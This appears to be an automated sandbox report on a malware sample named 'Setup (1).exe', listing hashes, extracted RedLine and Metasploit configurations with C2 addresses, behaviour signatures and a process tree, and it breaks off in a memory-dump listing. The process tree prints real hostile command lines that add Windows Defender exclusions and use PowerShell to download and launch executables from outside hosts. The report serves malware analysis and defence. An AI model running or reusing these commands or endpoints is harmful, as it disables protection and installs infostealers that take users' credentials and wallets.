Resubmissions

15-10-2024 15:36

241015-s1zlzasdkc 10

01-07-2024 18:32

240701-w6yteawhmq 10

01-07-2024 14:52

240701-r82wmaxdnd 10

01-07-2024 14:52

240701-r8syqa1dpp 10

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

Analysis

  • max time kernel
    872s
  • max time network
    1811s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (1).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 15 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 28 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 37 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 9 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Script User-Agent 11 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup (1).exe
    "C:\Users\Admin\AppData\Local\Temp\Setup (1).exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Users\Admin\Documents\lNwz6SiCAy3JXfun14vW5x3i.exe
      "C:\Users\Admin\Documents\lNwz6SiCAy3JXfun14vW5x3i.exe"
      2⤵
      • Executes dropped EXE
      PID:876
    • C:\Users\Admin\Documents\dbqIwbykjbIPQZO1fxRPPA8C.exe
      "C:\Users\Admin\Documents\dbqIwbykjbIPQZO1fxRPPA8C.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1996
    • C:\Users\Admin\Documents\utExbjHzS_i2tuX_8DNJ4Mas.exe
      "C:\Users\Admin\Documents\utExbjHzS_i2tuX_8DNJ4Mas.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:2024
      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system certificate store
        PID:2208
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
          • Executes dropped EXE
          PID:2508
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
            PID:3036
        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
          3⤵
          • Executes dropped EXE
          PID:2252
        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
          3⤵
          • Executes dropped EXE
          PID:2280
      • C:\Users\Admin\Documents\MQnwEPegpHQTXKbfhBCHsPek.exe
        "C:\Users\Admin\Documents\MQnwEPegpHQTXKbfhBCHsPek.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2028
        • C:\Users\Admin\Documents\MQnwEPegpHQTXKbfhBCHsPek.exe
          "C:\Users\Admin\Documents\MQnwEPegpHQTXKbfhBCHsPek.exe"
          3⤵
          • Executes dropped EXE
          PID:2740
      • C:\Users\Admin\Documents\Q5mIq74gi0I5LlZ_I6Iqrzfc.exe
        "C:\Users\Admin\Documents\Q5mIq74gi0I5LlZ_I6Iqrzfc.exe"
        2⤵
        • Executes dropped EXE
        PID:1272
      • C:\Users\Admin\Documents\npWWaGuzmj7bElG9vq6dNMNq.exe
        "C:\Users\Admin\Documents\npWWaGuzmj7bElG9vq6dNMNq.exe"
        2⤵
        • Executes dropped EXE
        PID:944
        • C:\Users\Admin\Documents\npWWaGuzmj7bElG9vq6dNMNq.exe
          C:\Users\Admin\Documents\npWWaGuzmj7bElG9vq6dNMNq.exe
          3⤵
          • Executes dropped EXE
          PID:2612
        • C:\Users\Admin\Documents\npWWaGuzmj7bElG9vq6dNMNq.exe
          C:\Users\Admin\Documents\npWWaGuzmj7bElG9vq6dNMNq.exe
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2680
      • C:\Users\Admin\Documents\w551PSOeHf47zGmf3PF8U_jm.exe
        "C:\Users\Admin\Documents\w551PSOeHf47zGmf3PF8U_jm.exe"
        2⤵
        • Executes dropped EXE
        PID:896
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
          3⤵
            PID:1204
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
              4⤵
                PID:2572
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                4⤵
                  PID:2784
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                  4⤵
                    PID:940
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                    4⤵
                      PID:2724
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                      4⤵
                        PID:2460
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                        4⤵
                          PID:1472
                    • C:\Users\Admin\Documents\q9THP91Vwj2240uH5C1oDDZI.exe
                      "C:\Users\Admin\Documents\q9THP91Vwj2240uH5C1oDDZI.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:1900
                      • C:\Users\Admin\Documents\q9THP91Vwj2240uH5C1oDDZI.exe
                        C:\Users\Admin\Documents\q9THP91Vwj2240uH5C1oDDZI.exe
                        3⤵
                        • Executes dropped EXE
                        PID:2644
                    • C:\Users\Admin\Documents\SUP1_Y6HEhp9xyAYwsOOkqF1.exe
                      "C:\Users\Admin\Documents\SUP1_Y6HEhp9xyAYwsOOkqF1.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:2000
                    • C:\Users\Admin\Documents\Kd1kB00r1mxrZ6tHKXBPVnNu.exe
                      "C:\Users\Admin\Documents\Kd1kB00r1mxrZ6tHKXBPVnNu.exe"
                      2⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1756
                    • C:\Users\Admin\Documents\xl0qJmuk5linw0vyqNCZbVq6.exe
                      "C:\Users\Admin\Documents\xl0qJmuk5linw0vyqNCZbVq6.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:824
                    • C:\Users\Admin\Documents\5AZqWm951gfT_CBIt5Q_DWgm.exe
                      "C:\Users\Admin\Documents\5AZqWm951gfT_CBIt5Q_DWgm.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:744
                    • C:\Users\Admin\Documents\yDA2qcgAsfm_wtPFoiPfNYPu.exe
                      "C:\Users\Admin\Documents\yDA2qcgAsfm_wtPFoiPfNYPu.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:1524
                      • C:\Users\Admin\Documents\yDA2qcgAsfm_wtPFoiPfNYPu.exe
                        C:\Users\Admin\Documents\yDA2qcgAsfm_wtPFoiPfNYPu.exe
                        3⤵
                          PID:1656
                      • C:\Users\Admin\Documents\AtfZMLQirSuxLeGZJR9A5HCJ.exe
                        "C:\Users\Admin\Documents\AtfZMLQirSuxLeGZJR9A5HCJ.exe"
                        2⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:2316
                      • C:\Users\Admin\Documents\28UdWFpD3tZlgyBecpWvWrSH.exe
                        "C:\Users\Admin\Documents\28UdWFpD3tZlgyBecpWvWrSH.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:2292
                      • C:\Users\Admin\Documents\T8juH1K1vzyjn48kQfsA0PaO.exe
                        "C:\Users\Admin\Documents\T8juH1K1vzyjn48kQfsA0PaO.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2452
                        • C:\Users\Admin\AppData\Local\Temp\is-47OAD.tmp\T8juH1K1vzyjn48kQfsA0PaO.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-47OAD.tmp\T8juH1K1vzyjn48kQfsA0PaO.tmp" /SL5="$8001C,138429,56832,C:\Users\Admin\Documents\T8juH1K1vzyjn48kQfsA0PaO.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Modifies system certificate store
                          • Suspicious use of FindShellTrayWindow
                          PID:1292
                          • C:\Users\Admin\AppData\Local\Temp\is-TI7T8.tmp\Setup.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-TI7T8.tmp\Setup.exe" /Verysilent
                            4⤵
                            • Executes dropped EXE
                            PID:1940
                            • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                              "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                              5⤵
                                PID:2232
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im LGCH2-401_2021-08-18_14-40.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe" & del C:\ProgramData\*.dll & exit
                                  6⤵
                                    PID:4000
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im LGCH2-401_2021-08-18_14-40.exe /f
                                      7⤵
                                      • Kills process with taskkill
                                      PID:1720
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 6
                                      7⤵
                                      • Delays execution with timeout.exe
                                      PID:4084
                                • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                  "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                  5⤵
                                    PID:2536
                                    • C:\Users\Admin\AppData\Local\Temp\is-UAQ4J.tmp\Inlog.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-UAQ4J.tmp\Inlog.tmp" /SL5="$201D4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                      6⤵
                                        PID:740
                                    • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                      "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                      5⤵
                                      • Suspicious use of SetThreadContext
                                      PID:944
                                      • C:\Users\Admin\AppData\Local\Temp\is-C25GE.tmp\VPN.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-C25GE.tmp\VPN.tmp" /SL5="$10202,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                        6⤵
                                          PID:1648
                                      • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                        "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                        5⤵
                                          PID:1920
                                        • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                          "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                          5⤵
                                            PID:1928
                                            • C:\Users\Admin\Documents\MGJCUq20MLAUl6C_ZpjhVo7Q.exe
                                              "C:\Users\Admin\Documents\MGJCUq20MLAUl6C_ZpjhVo7Q.exe"
                                              6⤵
                                                PID:1540
                                              • C:\Users\Admin\Documents\2iajawRngweI9D12eKeIBq9v.exe
                                                "C:\Users\Admin\Documents\2iajawRngweI9D12eKeIBq9v.exe"
                                                6⤵
                                                  PID:820
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "2iajawRngweI9D12eKeIBq9v.exe" /f & erase "C:\Users\Admin\Documents\2iajawRngweI9D12eKeIBq9v.exe" & exit
                                                    7⤵
                                                      PID:1620
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im "2iajawRngweI9D12eKeIBq9v.exe" /f
                                                        8⤵
                                                        • Kills process with taskkill
                                                        PID:3524
                                                  • C:\Users\Admin\Documents\Id2TYVYe31b5SXUEzi2ZqKcV.exe
                                                    "C:\Users\Admin\Documents\Id2TYVYe31b5SXUEzi2ZqKcV.exe"
                                                    6⤵
                                                      PID:1892
                                                    • C:\Users\Admin\Documents\pfEL9syP5qtLooqUDvFZe6Ps.exe
                                                      "C:\Users\Admin\Documents\pfEL9syP5qtLooqUDvFZe6Ps.exe"
                                                      6⤵
                                                        PID:2812
                                                      • C:\Users\Admin\Documents\tEk5Grzq7h28qBWv5mlM7lx1.exe
                                                        "C:\Users\Admin\Documents\tEk5Grzq7h28qBWv5mlM7lx1.exe"
                                                        6⤵
                                                          PID:2284
                                                        • C:\Users\Admin\Documents\_B_Ct4cOUIt5pWwbPvU3mwuB.exe
                                                          "C:\Users\Admin\Documents\_B_Ct4cOUIt5pWwbPvU3mwuB.exe"
                                                          6⤵
                                                            PID:2432
                                                          • C:\Users\Admin\Documents\Bz49pNiTe1PkxgxzGQib3KGT.exe
                                                            "C:\Users\Admin\Documents\Bz49pNiTe1PkxgxzGQib3KGT.exe"
                                                            6⤵
                                                              PID:2736
                                                            • C:\Users\Admin\Documents\4DNM8QiP9VRDcl6FyWmYLVwN.exe
                                                              "C:\Users\Admin\Documents\4DNM8QiP9VRDcl6FyWmYLVwN.exe"
                                                              6⤵
                                                                PID:2312
                                                              • C:\Users\Admin\Documents\X038EjmOzSg2fnFfzILh7Nog.exe
                                                                "C:\Users\Admin\Documents\X038EjmOzSg2fnFfzILh7Nog.exe"
                                                                6⤵
                                                                  PID:1956
                                                                  • C:\Users\Admin\Documents\X038EjmOzSg2fnFfzILh7Nog.exe
                                                                    "C:\Users\Admin\Documents\X038EjmOzSg2fnFfzILh7Nog.exe" -q
                                                                    7⤵
                                                                      PID:2720
                                                                  • C:\Users\Admin\Documents\SGtj2bMWo0qCZlTJtc3AnwMs.exe
                                                                    "C:\Users\Admin\Documents\SGtj2bMWo0qCZlTJtc3AnwMs.exe"
                                                                    6⤵
                                                                      PID:588
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 840
                                                                        7⤵
                                                                        • Program crash
                                                                        PID:2880
                                                                    • C:\Users\Admin\Documents\m9fmgF8JW35Q8sV3gkEG0zYk.exe
                                                                      "C:\Users\Admin\Documents\m9fmgF8JW35Q8sV3gkEG0zYk.exe"
                                                                      6⤵
                                                                        PID:2216
                                                                      • C:\Users\Admin\Documents\KqEgDojaUO5rRqHQiD32erzK.exe
                                                                        "C:\Users\Admin\Documents\KqEgDojaUO5rRqHQiD32erzK.exe"
                                                                        6⤵
                                                                          PID:332
                                                                        • C:\Users\Admin\Documents\qn7XJ9oPEQ_mUyPuUlCJjcKF.exe
                                                                          "C:\Users\Admin\Documents\qn7XJ9oPEQ_mUyPuUlCJjcKF.exe"
                                                                          6⤵
                                                                            PID:1432
                                                                          • C:\Users\Admin\Documents\RtZfV3rLAOd05yDLbjwDp6o8.exe
                                                                            "C:\Users\Admin\Documents\RtZfV3rLAOd05yDLbjwDp6o8.exe"
                                                                            6⤵
                                                                              PID:2704
                                                                              • C:\Users\Admin\Documents\RtZfV3rLAOd05yDLbjwDp6o8.exe
                                                                                C:\Users\Admin\Documents\RtZfV3rLAOd05yDLbjwDp6o8.exe
                                                                                7⤵
                                                                                  PID:852
                                                                                • C:\Users\Admin\Documents\RtZfV3rLAOd05yDLbjwDp6o8.exe
                                                                                  C:\Users\Admin\Documents\RtZfV3rLAOd05yDLbjwDp6o8.exe
                                                                                  7⤵
                                                                                    PID:3104
                                                                                • C:\Users\Admin\Documents\Az0ULHMI3S1Mxwr6WcyI1Zlq.exe
                                                                                  "C:\Users\Admin\Documents\Az0ULHMI3S1Mxwr6WcyI1Zlq.exe"
                                                                                  6⤵
                                                                                    PID:2264
                                                                                    • C:\Users\Admin\Documents\Az0ULHMI3S1Mxwr6WcyI1Zlq.exe
                                                                                      C:\Users\Admin\Documents\Az0ULHMI3S1Mxwr6WcyI1Zlq.exe
                                                                                      7⤵
                                                                                        PID:3564
                                                                                      • C:\Users\Admin\Documents\Az0ULHMI3S1Mxwr6WcyI1Zlq.exe
                                                                                        C:\Users\Admin\Documents\Az0ULHMI3S1Mxwr6WcyI1Zlq.exe
                                                                                        7⤵
                                                                                          PID:808
                                                                                      • C:\Users\Admin\Documents\zJ5MbcbSjYVkL7zQdRkXrHl0.exe
                                                                                        "C:\Users\Admin\Documents\zJ5MbcbSjYVkL7zQdRkXrHl0.exe"
                                                                                        6⤵
                                                                                          PID:1476
                                                                                        • C:\Users\Admin\Documents\YS73epnt_JCf6kCQxYdGHgUp.exe
                                                                                          "C:\Users\Admin\Documents\YS73epnt_JCf6kCQxYdGHgUp.exe"
                                                                                          6⤵
                                                                                            PID:2420
                                                                                          • C:\Users\Admin\Documents\SiveW0DCTT1EJ2hYwnVZaFR7.exe
                                                                                            "C:\Users\Admin\Documents\SiveW0DCTT1EJ2hYwnVZaFR7.exe"
                                                                                            6⤵
                                                                                              PID:1912
                                                                                            • C:\Users\Admin\Documents\OGoCq3F47ixiG98lof2KU2tR.exe
                                                                                              "C:\Users\Admin\Documents\OGoCq3F47ixiG98lof2KU2tR.exe"
                                                                                              6⤵
                                                                                                PID:188
                                                                                              • C:\Users\Admin\Documents\YpCMQOaSi20Nk01wOGzDqFD8.exe
                                                                                                "C:\Users\Admin\Documents\YpCMQOaSi20Nk01wOGzDqFD8.exe"
                                                                                                6⤵
                                                                                                  PID:2460
                                                                                                • C:\Users\Admin\Documents\uRKA_D7Z0RU7AGhvSHBAYy6y.exe
                                                                                                  "C:\Users\Admin\Documents\uRKA_D7Z0RU7AGhvSHBAYy6y.exe"
                                                                                                  6⤵
                                                                                                    PID:3068
                                                                                                  • C:\Users\Admin\Documents\FWt6LUOep3WelaFN3QRYwDJP.exe
                                                                                                    "C:\Users\Admin\Documents\FWt6LUOep3WelaFN3QRYwDJP.exe"
                                                                                                    6⤵
                                                                                                      PID:2896
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                    5⤵
                                                                                                      PID:1592
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                      5⤵
                                                                                                        PID:2708
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                        5⤵
                                                                                                          PID:1744
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                          5⤵
                                                                                                            PID:3024
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                            5⤵
                                                                                                              PID:2404
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                6⤵
                                                                                                                  PID:1924
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                    7⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:2840
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                5⤵
                                                                                                                  PID:2712
                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                  5⤵
                                                                                                                    PID:296
                                                                                                            • C:\Users\Admin\Documents\Kcz_xi6U979z9VFESzmdB_j2.exe
                                                                                                              "C:\Users\Admin\Documents\Kcz_xi6U979z9VFESzmdB_j2.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2424
                                                                                                            • C:\Users\Admin\Documents\gv6yF4H_kdVRvEaIHO3Vsmaf.exe
                                                                                                              "C:\Users\Admin\Documents\gv6yF4H_kdVRvEaIHO3Vsmaf.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2412
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-EK8GU.tmp\WEATHER Manager.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-EK8GU.tmp\WEATHER Manager.tmp" /SL5="$101FE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                            1⤵
                                                                                                              PID:2824
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-9Q406.tmp\Setup.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-9Q406.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                2⤵
                                                                                                                  PID:2252
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                1⤵
                                                                                                                  PID:1092
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-LL4B6.tmp\MediaBurner2.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-LL4B6.tmp\MediaBurner2.tmp" /SL5="$40180,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                  1⤵
                                                                                                                    PID:2728
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-4BDNH.tmp\3377047_logo_media.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-4BDNH.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                      2⤵
                                                                                                                        PID:3040
                                                                                                                        • C:\Program Files\Uninstall Information\MNMFIIKIMG\ultramediaburner.exe
                                                                                                                          "C:\Program Files\Uninstall Information\MNMFIIKIMG\ultramediaburner.exe" /VERYSILENT
                                                                                                                          3⤵
                                                                                                                            PID:2340
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-SPFF9.tmp\ultramediaburner.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-SPFF9.tmp\ultramediaburner.tmp" /SL5="$50180,281924,62464,C:\Program Files\Uninstall Information\MNMFIIKIMG\ultramediaburner.exe" /VERYSILENT
                                                                                                                              4⤵
                                                                                                                                PID:2516
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\f7-4f653-13a-ac890-5de41020a21d9\Qyzhujataeny.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\f7-4f653-13a-ac890-5de41020a21d9\Qyzhujataeny.exe"
                                                                                                                              3⤵
                                                                                                                                PID:3760
                                                                                                                                • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                  4⤵
                                                                                                                                    PID:3828
                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3828 CREDAT:275457 /prefetch:2
                                                                                                                                      5⤵
                                                                                                                                        PID:3496
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\63-2f256-ab3-e618d-85964a2665cc0\Hibifegaeli.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\63-2f256-ab3-e618d-85964a2665cc0\Hibifegaeli.exe"
                                                                                                                                    3⤵
                                                                                                                                      PID:1660
                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:1900
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 1CC153D42E3342A4A7B2A5D085F42017 C
                                                                                                                                    2⤵
                                                                                                                                      PID:2008

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • memory/744-106-0x0000000000F50000-0x0000000000F51000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/824-134-0x0000000000220000-0x0000000000229000-memory.dmp

                                                                                                                                    Filesize

